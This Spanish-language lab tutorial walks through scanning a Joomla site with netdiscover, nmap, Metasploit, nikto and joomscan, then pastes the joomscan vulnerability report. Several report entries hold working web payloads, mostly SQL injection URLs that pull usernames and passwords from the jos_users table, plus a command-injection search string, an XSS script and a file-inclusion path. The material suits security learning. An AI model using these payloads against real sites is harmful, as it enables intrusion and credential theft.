Antes que nada, comentar que esta capsula se ha realizado en máquinas internas de nuestro laboratorio y simplemente con afán de aprendizaje y experimentación.

¡Empecemos!

Primero que nada, vamos a rastrear dentro de nuestra red privada donde está ubicado nuestro Joomla objetivo y para ello utilizamos los comandos netdiscover y nmap.

A través de meta exploid vamos a buscar un auxiliar que nos permita conocer la versión de Joomla que vamos a analizar. Utilizaremos el siguiente auxiliar:

use auxiliary/scanner/http/joomla_version

También nos va a servir conocer las posibles vulnerabilidades que podemos encontrar en el servidor web que hospeda el Joomla. Para ello vamos a utilizar una herramienta denominada nikto y esta es la sintaxis del comando a ejecutar:

nickto -h <ip> -F html -output web_server_nikto.html

Comprobamos que ambas herramientas devuelven la misma versión.

Una vez conocida la dirección ip del servidor y que la versión del entorno web es un Joomla nos dirigimos al navegador web para comprobar que se trata de un Joomla. En la barra de direcciones escribimos:

http://midominio/administrator

¡Efectivamente es un Joomla!

Una vez realizados estos pasos utilizaremos la herramienta joomscan que nos lanzará por consola todas las vulnerabilidades de la versión actual de Joomla que tenemos en marcha a través de Fingerprinting.

joomscan -u http://midominio

Esta es la salida de pantalla del análisis de vulnerabilidades:

Vulnerabilities Discovered
==========================

# 1
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 2
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application. Affected administrator components include com_admin, com_media, com_search. Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.
Vulnerable? N/A

# 3
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie. This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 4
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped. Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS – HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 6
Info -> Core: Frontend XSS – PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 7
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? N/A

# 8
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 9
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

# 10
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? N/A

# 11
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? N/A

# 12
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72–
Vulnerable? No

# 13
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 14
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72–&Itemid=1
Vulnerable? No

# 15
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%’ +’a’=’a&id=25&Itemid=28
Vulnerable? No

# 16
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc). This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? N/A

# 17
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? N/A

# 18
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? N/A

# 19
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars – filter, month, year to /index.php?option=com_content&view=archive
Vulnerable? No

# 20
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? N/A

# 21
Info -> CoreComponent: com_users XSS Vulnerability
Version Affected: Joomla! 1.5.10 <=
Check: /components/com_users/
Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel.
Vulnerable? N/A

# 22
Info -> CoreComponent: com_installer CSRF Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /administrator/components/com_installer/
Exploit: N/A
Vulnerable? N/A

# 23
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 24
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0’+and+’1’=’1::/index.php?option=com_banners&task=archivesection&id=0’+and+’1’=’2
Vulnerable? No

# 25
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? N/A

# 26
Info -> Component: Dada Mail Manager Component Remote File Inclusion Vulnerability
Version Affected: 2.6 <=
Check: /administrator/components/
Exploit: /administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Vulnerable? No

# 27
Info -> Component: cgTestimonial XSS
Versions Affected: 2.2
Check: /components/com_cgtestimonial/video.php?url=”><script>alert(‘xss’);</script>
Exploit: /components/com_cgtestimonial/video.php?url=”><script>alert(‘xss’);</script>
Vulnerable? N/A

# 28
Info -> Component: Joomla Component com_iproperty SQL Injection Vulnerability
Versions Affected: Any
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Exploit: /index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users-
Vulnerable? No

# 29
Info -> Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
Versions Affected: Any
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Exploit: /index.php?option=com_iproperty&view=agentproperties&id=
Vulnerable? No

# 30
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users–
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users–
Vulnerable? No

# 31
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 32
Info -> Component: Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability
Versions Affected: Any <=
Check: /index.php?option=com_iproperty&view=agentproperties&id=
Exploit: /index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users–
Vulnerable? No

There is a vulnerable point in 32 found entries!

———————————————————————–

Una vez conociéndolas nos da una breve descripción de cómo utilizar el exploid.